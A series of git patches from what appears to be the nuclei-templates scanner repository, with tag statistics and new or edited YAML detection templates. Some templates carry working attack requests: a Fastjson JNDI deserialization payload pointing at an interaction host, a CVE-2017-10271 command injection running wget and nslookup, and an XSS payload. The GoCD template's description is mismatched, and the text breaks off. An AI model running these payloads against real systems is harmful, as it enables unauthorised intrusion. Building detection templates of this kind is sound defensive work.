aspnuke | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| appveyor | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| seeddms | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| circleci | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| matrix | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| package | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| webctrl | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| messaging | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| sast | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| find | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| alienvault | 1 | | | | | | | | | +| iconfinder | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| strava | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| virustotal | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| umbraco | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| optimizely | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| wp | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| apigee | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| square | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| sugarcrm | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| iucn | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| abuseipdb | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| europeana | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| dreamweaver | 1 | | | | | | | | | +| cliniccases | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| netlify | 1 | | | | | | | | | +| cvnd | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| catfishcms | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| circle | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| wix | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| key | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| bing | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| digitalocean | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| dwsync | 1 | | | | | | | | | +| planon | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| myanimelist | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| paypal | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| cve202 | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| intercom | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| twitter | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| instagram | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| facebook | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 1569a3d987..feaf8ddf53 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 | -| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 | -| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 | -| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 | -| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | | -| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | | -| rce | 218 | gy741 | 83 | token-spray | 83 | | | | | -| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | | -| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | | -| cve2020 | 166 | madrobot | 63 | file | 51 | | | | | +| cve | 852 | dhiyaneshdk | 309 | cves | 856 | info | 833 | http | 2326 | +| lfi | 350 | daffainfo | 304 | vulnerabilities | 333 | high | 659 | file | 57 | +| panel | 295 | pikpikcu | 281 | exposed-panels | 289 | medium | 493 | network | 46 | +| xss | 266 | pdteam | 208 | technologies | 210 | critical | 303 | dns | 12 | +| wordpress | 262 | geeknik | 172 | exposures | 199 | low | 158 | | | +| exposure | 250 | dwisiswant0 | 152 | misconfiguration | 148 | | | | | +| rce | 221 | gy741 | 85 | token-spray | 98 | | | | | +| tech | 204 | pussycat0x | 76 | takeovers | 66 | | | | | +| wp-plugin | 180 | princechaddha | 67 | default-logins | 61 | | | | | +| cve2021 | 166 | madrobot | 65 | file | 57 | | | | | From 5365a928e1eb386cac0bf47fe14510cf666bc7a1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Nov 2021 10:23:22 +0000 Subject: [PATCH 3385/4083] Auto README Update [Thu Nov 4 10:23:22 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 6885808669..93de150135 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 | -| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 | -| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 | -| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 | -| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | | -| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | | -| rce | 218 | gy741 | 83 | token-spray | 83 | | | | | -| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | | -| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | | -| cve2020 | 166 | madrobot | 63 | file | 51 | | | | | +| cve | 852 | dhiyaneshdk | 309 | cves | 856 | info | 833 | http | 2326 | +| lfi | 350 | daffainfo | 304 | vulnerabilities | 333 | high | 659 | file | 57 | +| panel | 295 | pikpikcu | 281 | exposed-panels | 289 | medium | 493 | network | 46 | +| xss | 266 | pdteam | 208 | technologies | 210 | critical | 303 | dns | 12 | +| wordpress | 262 | geeknik | 172 | exposures | 199 | low | 158 | | | +| exposure | 250 | dwisiswant0 | 152 | misconfiguration | 148 | | | | | +| rce | 221 | gy741 | 85 | token-spray | 98 | | | | | +| tech | 204 | pussycat0x | 76 | takeovers | 66 | | | | | +| wp-plugin | 180 | princechaddha | 67 | default-logins | 61 | | | | | +| cve2021 | 166 | madrobot | 65 | file | 57 | | | | | -**178 directories, 2459 files**. +**181 directories, 2509 files**. From fffd1f533cf444c66e3f4125b0b2807c67894c96 Mon Sep 17 00:00:00 2001 From: yuan <121467570@qq.com> Date: Thu, 4 Nov 2021 18:56:37 +0800 Subject: [PATCH 3386/4083] Create weblogic-panel.yaml --- exposed-panels/weblogic-panel.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/weblogic-panel.yaml diff --git a/exposed-panels/weblogic-panel.yaml b/exposed-panels/weblogic-panel.yaml new file mode 100644 index 0000000000..150bd707b1 --- /dev/null +++ b/exposed-panels/weblogic-panel.yaml @@ -0,0 +1,24 @@ +id: weblogic-panel + +info: + name: Weblogic Panel Detection Template + author: yuansec + severity: info + description: Try to detect the presence of a Weblogic instance via the login page + tags: panel,weblogic + +requests: + - method: GET + path: + - "{{BaseURL}}/console/login/LoginForm.jsp" + + matchers-condition: and + matchers: + - type: word + words: + - "WebLogic Server" + part: body + + - type: status + status: + - 200 \ No newline at end of file From 78189af2953a975bec9a8d845d69fec37b3d4d3d Mon Sep 17 00:00:00 2001 From: Huy Nguyen Date: Thu, 4 Nov 2021 12:07:38 +0100 Subject: [PATCH 3387/4083] Fix for potential false positives See also following issue: https://github.com/projectdiscovery/nuclei-templates/issues/3065 --- cves/2018/CVE-2018-10093.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-10093.yaml b/cves/2018/CVE-2018-10093.yaml index bdb9d75bc5..6c881cf9d6 100644 --- a/cves/2018/CVE-2018-10093.yaml +++ b/cves/2018/CVE-2018-10093.yaml @@ -25,7 +25,7 @@ requests: - type: regex regex: - - "admin:.*:" + - "admin:.*:*sh$" - type: status status: From 1e556e0cfd49a2c39f1c738f6e3bf2ee0a5a076f Mon Sep 17 00:00:00 2001 From: yuan <121467570@qq.com> Date: Thu, 4 Nov 2021 20:36:06 +0800 Subject: [PATCH 3388/4083] Create fastjson-version-detection.yaml --- technologies/fastjson-version-detection.yaml | 44 ++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 technologies/fastjson-version-detection.yaml diff --git a/technologies/fastjson-version-detection.yaml b/technologies/fastjson-version-detection.yaml new file mode 100644 index 0000000000..3336b0ec72 --- /dev/null +++ b/technologies/fastjson-version-detection.yaml @@ -0,0 +1,44 @@ +id: fastjson-1-2-47-rce + +info: + name: Fastjson 1.2.47 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce + - https://www.freebuf.com/vuls/208339.html + - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization,oast + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "a":{ + "@type":"java.lang.Class", + "val":"com.sun.rowset.JdbcRowSetImpl" + }, + "b":{ + "@type":"com.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: word + condition: and + words: + - "Bad Request" + - "400" \ No newline at end of file From 859c403f1b6850e141b2c7343c8be39e003e0868 Mon Sep 17 00:00:00 2001 From: yuan <121467570@qq.com> Date: Thu, 4 Nov 2021 20:38:12 +0800 Subject: [PATCH 3389/4083] update --- exposed-panels/weblogic-panel.yaml | 24 ------------------------ 1 file changed, 24 deletions(-) delete mode 100644 exposed-panels/weblogic-panel.yaml diff --git a/exposed-panels/weblogic-panel.yaml b/exposed-panels/weblogic-panel.yaml deleted file mode 100644 index 150bd707b1..0000000000 --- a/exposed-panels/weblogic-panel.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: weblogic-panel - -info: - name: Weblogic Panel Detection Template - author: yuansec - severity: info - description: Try to detect the presence of a Weblogic instance via the login page - tags: panel,weblogic - -requests: - - method: GET - path: - - "{{BaseURL}}/console/login/LoginForm.jsp" - - matchers-condition: and - matchers: - - type: word - words: - - "WebLogic Server" - part: body - - - type: status - status: - - 200 \ No newline at end of file From 65105b955452dab5a3e36eefac1355bf76106cc3 Mon Sep 17 00:00:00 2001 From: yuan <121467570@qq.com> Date: Thu, 4 Nov 2021 20:46:29 +0800 Subject: [PATCH 3390/4083] Create fastjson-version-detection.yaml --- technologies/fastjson-version-detection.yaml | 40 ++++++-------------- 1 file changed, 11 insertions(+), 29 deletions(-) diff --git a/technologies/fastjson-version-detection.yaml b/technologies/fastjson-version-detection.yaml index 3336b0ec72..fa43434a0e 100644 --- a/technologies/fastjson-version-detection.yaml +++ b/technologies/fastjson-version-detection.yaml @@ -1,15 +1,13 @@ -id: fastjson-1-2-47-rce +id: fastjson-version-detection info: - name: Fastjson 1.2.47 Deserialization RCE - author: zh - severity: critical + name: Fastjson Version Detection + author: yuansec + severity: info + description: If the server returns an exception to the client,The fastjson version will be retrieved,Fastjson versions greater than 1.2.41,Contains the latest version(1.2.76). reference: - - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce - - https://www.freebuf.com/vuls/208339.html - - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 - - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization,oast + - https://blog.csdn.net/caiqiiqi/article/details/107907489 + tags: fastjson,version,version detection requests: - raw: @@ -18,27 +16,11 @@ requests: Host: {{Hostname}} Content-Type: application/json - { - "a":{ - "@type":"java.lang.Class", - "val":"com.sun.rowset.JdbcRowSetImpl" - }, - "b":{ - "@type":"com.sun.rowset.JdbcRowSetImpl", - "dataSourceName":"rmi://{{interactsh-url}}/Exploit", - "autoCommit":true - } - } + {"@type":"java.lang.AutoCloseable" - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: body words: - - "dns" - - - type: word - condition: and - words: - - "Bad Request" - - "400" \ No newline at end of file + - "fastjson-version" + From 2fc9a1f8509ee321074be0a707e1249655348907 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Thu, 4 Nov 2021 13:44:56 +0000 Subject: [PATCH 3391/4083] Updates CVE-2017-10271 Partially resolves #609 - not all machines have HTTP connectivity, nslookup is native to Windows and Linux, and a good alternative. --- cves/2017/CVE-2017-10271.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 86a37f5d34..87b674f5d8 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -39,7 +39,7 @@ requests: -c - wget {{interactsh-url}} + nslookup {{interactsh-url}} @@ -51,6 +51,6 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the DNS interaction words: - - "http" + - "dns" From 5a940914687ba2239933f4280430afff5849377c Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Thu, 4 Nov 2021 15:12:47 +0000 Subject: [PATCH 3392/4083] Create vanguard-post-xss --- vulnerabilities/vanguard-post-xss | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/vanguard-post-xss diff --git a/vulnerabilities/vanguard-post-xss b/vulnerabilities/vanguard-post-xss new file mode 100644 index 0000000000..5dca02d970 --- /dev/null +++ b/vulnerabilities/vanguard-post-xss @@ -0,0 +1,27 @@ +id: vanguard-post-xss + +info: + name: Vanguard Marketplace CMS ≤ 2.1 + author: ImNightmaree + severity: medium + reference: https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html + tags: vanguard-cms,xss + +requests: + - raw: + - | + POST /search HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + phps_query=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3B%3E + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '' From e98a1b40859906456a17dfd80599c274e76fb0d8 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Thu, 4 Nov 2021 16:56:40 +0000 Subject: [PATCH 3393/4083] Update vanguard-post-xss --- vulnerabilities/vanguard-post-xss | 4 ---- 1 file changed, 4 deletions(-) diff --git a/vulnerabilities/vanguard-post-xss b/vulnerabilities/vanguard-post-xss index 5dca02d970..3f0c14b3fd 100644 --- a/vulnerabilities/vanguard-post-xss +++ b/vulnerabilities/vanguard-post-xss @@ -18,10 +18,6 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - '' From 3eff5e541d23e8a1e04c06a6448cf90a64dc13cf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 01:30:11 +0530 Subject: [PATCH 3394/4083] Create pre-auth-rce-gocd.yaml --- misconfiguration/pre-auth-rce-gocd.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 misconfiguration/pre-auth-rce-gocd.yaml diff --git a/misconfiguration/pre-auth-rce-gocd.yaml b/misconfiguration/pre-auth-rce-gocd.yaml new file mode 100644 index 0000000000..7b60ad5820 --- /dev/null +++ b/misconfiguration/pre-auth-rce-gocd.yaml @@ -0,0 +1,23 @@ +id: pre-auth-rce-gocd + +info: + name: Pre-Auth Takeover of Build Pipelines in GoCD + author: dhiyaneshDk + severity: critical + reference: https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 + tags: go,rce,intrusive + description: "An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution." + +requests: + - method: GET + path: + - 